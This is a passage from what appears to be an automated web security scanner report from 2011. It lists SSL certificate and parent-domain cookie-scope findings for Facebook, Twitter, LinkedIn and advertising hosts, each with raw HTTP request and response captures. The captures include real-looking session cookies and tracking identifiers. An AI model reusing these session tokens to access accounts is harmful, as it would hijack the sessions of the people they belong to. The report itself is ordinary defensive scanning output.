The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df42349018%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322bc3668%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda0aaa7%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a882414%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23cc7f5dc%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.52
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 22

Invalid Application ID

10. SSL certificate previous next
There are 4 instances of this issue:

https://sprintlb.ehosts.net/
https://socialize.gigya.com/
https://www.linkedin.com/
https://www.sprint.net/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

10.1. https://sprintlb.ehosts.net/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://sprintlb.ehosts.net
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	*.ehosts.net
Issued by:	DigiCert High Assurance CA-3
Valid from:	Fri Nov 19 18:00:00 GMT-06:00 2010
Valid to:	Tue Jan 22 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:	Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:	Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

10.2. https://socialize.gigya.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://socialize.gigya.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.gigya.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Nov 04 09:50:30 GMT-06:00 2010
Valid to:	Sun Nov 04 09:50:30 GMT-06:00 2012

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:	Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:	Thu Jun 29 11:06:20 GMT-06:00 2034

10.3. https://www.linkedin.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.linkedin.com
Issued by:	Thawte SGC CA - G2
Valid from:	Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:	Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	Thawte SGC CA - G2
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Wed Jul 28 18:00:00 GMT-06:00 2010
Valid to:	Tue Jul 28 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Wed Jul 16 17:59:59 GMT-06:00 2036

10.4. https://www.sprint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.sprint.net
Issued by:	Entrust Certification Authority - L1B
Valid from:	Mon May 18 12:20:39 GMT-06:00 2009
Valid to:	Tue Jun 05 12:50:38 GMT-06:00 2012

Certificate chain #1

Issued to:	Entrust Certification Authority - L1B
Issued by:	Entrust.net Certification Authority (2048)
Valid from:	Mon Aug 25 12:14:26 GMT-06:00 2008
Valid to:	Sat Aug 25 12:44:26 GMT-06:00 2018

Certificate chain #2

Issued to:	Entrust.net Certification Authority (2048)
Issued by:	Entrust.net Certification Authority (2048)
Valid from:	Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:	Tue Jul 24 08:15:12 GMT-06:00 2029

11. Cookie scoped to parent domain previous next
There are 72 instances of this issue:

http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
http://api.twitter.com/1/statuses/user_timeline.json
http://www.personalcreations.com/
http://ad.afy11.net/ad
http://ad.turn.com/server/ads.js
http://ads.adbrite.com/adserver/vdi/742697
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/rtset
http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62
http://ce.lijit.com/merge
http://cm.npc-mcclatchy.overture.com/js_1_0/
http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771
http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771
http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771
http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771
http://i.casalemedia.com/imp.gif
http://ib.adnxs.com/getuid
http://image2.pubmatic.com/AdServer/Pug
http://imp.fetchback.com/serve/fb/adtag.js
http://imp.fetchback.com/serve/fb/imp
http://leadback.advertising.com/adcedge/lb
http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794
http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/F09828/a4/0/0/0.js
http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js
http://pix04.revsci.net/J06575/a4/0/0/pcx.js
http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js
http://pixel.mathtag.com/sync
http://r.casalemedia.com/rum
http://r.openx.net/set
http://r.turn.com/r/bd
http://r.turn.com/r/beacon
http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/
http://rma-api.gravity.com/v1/beacons/initialize
http://rt.legolas-media.com/lgrt
http://sync.adap.tv/sync
http://sync.mathtag.com/sync
http://syndication.mmismm.com/tntwo.php
http://tacoda.at.atwola.com/rtx/r.js
http://tags.bluekai.com/site/4195
http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif
http://tu.connect.wunderloop.net/TU/1/1/1/
http://www.bizographics.com/collect/
https://www.linkedin.com/secure/login
http://www.personalcreations.com/apparel-gifts-her-PHERAPP
http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY
http://www.personalcreations.com/halloween-home-decorations-PHALHOM
http://www.personalcreations.com/just-because-gifts-PJBEBSL
http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL
http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S
http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL
http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR
http://www.personalcreations.com/personalized-business-gifts-PBIZGFT
http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL
http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN
http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA
http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA
http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP
http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW
http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG
http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW
http://www.personalcreations.com/personalized-pet-gifts-PPETBSL
http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL
http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

11.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=110147983668019200&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1315097070986=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315097213-36482-17537
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 00:46:53 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.03541
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 9d4c870c9296f3cdf37ddb0b78039db1ef7aa6d3
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

11.2. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=TheStateWorker&callback=jQuery15205311797398608178_1315097321811&_=1315097336786 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTcy%250ANjg1MmRkYWE1MzRlMmE4OGU2OTFjYTBiYWVlOWQ1--e78b59f956406f6acf8bd93189b1699ee1b15969

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 01:02:55 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00676
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 01:07:55 GMT
Vary: Accept-Encoding
Content-Length: 267
Connection: close

jQuery15205311797398608178_1315097321811({"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/statuses\/user_timeline.json?screen_name=TheStateWorker&c
...[SNIP]...

11.3. http://www.personalcreations.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.personalcreations.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:11 PM; domain=.personalcreations.com; path=/
BrowsingStore=uvn4ybjeh3ciqrzoi2ilygjh; domain=personalcreations.com; path=/
THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-1,xta-1,trf-2,tpp-3,tbc-1,ntd-1,tvc-2,tmm-1,xtb-1,tnp-1,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:11 GMT; path=/
ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-2,thp-1,txb-1,tks-2,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
PRVD=SiteSplitID=42; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:11 GMT; path=/
PCR_BrowserId=d9954876-3a8e-4f70-8099-40c2ea2161b9; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.4. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s=1,2*4e62cac9*7ILJjOd50C*xAn6CqfjViVWUXPcP2NGnpPxnQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2925993182975414771 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4e62cac9*7ILJjOd50C*xAn6CqfjViVWUXPcP2NGnpPxnQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

11.5. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26912047&ahcid=2168902&bimpd=_P8jnlWa9XstK_JlmmehibBCY86uUcZ8orSis2gk3CgGuM8NRppyPQMYvcwYVWxeqx53lV-injqapvMTqVcy93ETQudoxG65t8gPvD3_8uXTH1PXOPFQZu8QV_sfud_H-APXWDieQ47BkVHFFBn37s3aR3R9fKaUZJwqF3RKDtidgFaK5usOyzENC88rTUlt9K10asyG35OWlNfIYOZ-eD5tcSKw-zblptFUhK9YrBvJ-WVZmeLXwW90Vc9Kb9XoiPnsI1H5EzsiLAXyc7PFNmMqw1dLCgnGdMDgUmN3gwdG_Ur_2SMU4K10y_Sli8mM2o2RfArbjquS3LhtH_oucb3wc-cQ7FRKnITKYzO3zYXWG83x93SQchtOADUffiJhCEHm6r5PNXkH9qRXbUWExW_-Tu619iR6e1KbNlVj8jLndn3HHWXSm6j08SLj-h_ckdMj51v2x5gNhdpsMl_xftjg47NtKOd3aMYaFKX0mDx-mbKM0JHYn1hPNWK3mE7pzqC_aS7mkgsjA3S3GAANk8l2hYjwLveMS5-0Prm8ku-d-0Mgw9kibbpEMGHOE3HL6dCtmc69w_hrmFS4bSqF1Ubrzov4KJkplEjIfx4sijhgID_WtH2HGV-ZlBaxQA1ij1j_O9y58VxgD6JjAd6GfmoJ8UbwkKQyww1upyp3jn-KeGFWA05C4wMLlJET2Sr393OncBALoxLqvhLiy_Csz4BhnEKFF2M8my_fgvGuVC-BGn7V08Zk_msX51p9Pm_1V71_KFY8MHiZdUStS_Pc88kzr_aJ80D7tEUMLPW-_InB3ZbanTW1OTZfNoJuT_Q8bPiK77OYvzyO19oo0lS1JrBteXm6E3IqGkdPbGLUoEv66yPDCbC2aqvzIe2Oz4Dl&acp=1.72 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

11.6. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

11.7. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_sZLs="MLtXrl8utl9nIAH3UpzIJlAWnrFYGbJvOWDi153GQb2cZxqKMlwiAWoJ5Yu9t3o3RMAlOi1iudA1qvDChUqCLpGZorRdTiZLCmu4FMR9FpglQcv0Y1wqRDvlSp+dnJtWb4pctVLY2kxSXEJ6h1S7KFlnlFhQJIHSkSQTXVd1wA8DYdU/cG7AYCLy9/dLqfyLTnaeh3NmViaoJIybWwWmlkBFss+7oIy0C5/dZoP1eijxhsUGplHBN8ZOLDaEyRA+gCdTCOCL7EINN3DAxLHHSdt5dg/i/I7/F0rRXTyOJHnaBHf4RLX0Ihr8i1qNqEYac/8uPOw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
